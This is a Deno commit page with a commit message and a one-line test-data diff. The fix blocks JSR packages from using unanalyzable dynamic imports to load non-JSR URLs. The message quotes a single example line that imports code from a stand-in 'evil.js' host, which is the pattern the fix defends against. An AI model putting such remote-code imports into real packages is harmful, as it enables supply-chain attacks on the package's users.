fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.
author: David Sherret <dsherret@users.noreply.github.com> 2024-02-28 16:30:45 -0500
committer: GitHub <noreply@github.com> 2024-02-28 16:30:45 -0500
commit: 918c5e648f4bd08d768374ccde1b451b84793b76 (patch)
tree: d8fd19eefae2f816d7301336413b49a08b9803e3 /tests/testdata/jsr/import_https_url/unanalyzable.ts
parent: f54acb53ed917eab1c7a2ba62e73963f9632d3df (diff)
1 files changed, 1 insertions, 0 deletions
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.ts b/tests/testdata/jsr/import_https_url/unanalyzable.ts
new file mode 100644
index 000000000..87ccdcfdc
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/unanalyzable";
author	David Sherret <dsherret@users.noreply.github.com>	2024-02-28 16:30:45 -0500
committer	GitHub <noreply@github.com>	2024-02-28 16:30:45 -0500
commit	918c5e648f4bd08d768374ccde1b451b84793b76 (patch)
tree	d8fd19eefae2f816d7301336413b49a08b9803e3 /tests/testdata/jsr/import_https_url/unanalyzable.ts
parent	f54acb53ed917eab1c7a2ba62e73963f9632d3df (diff)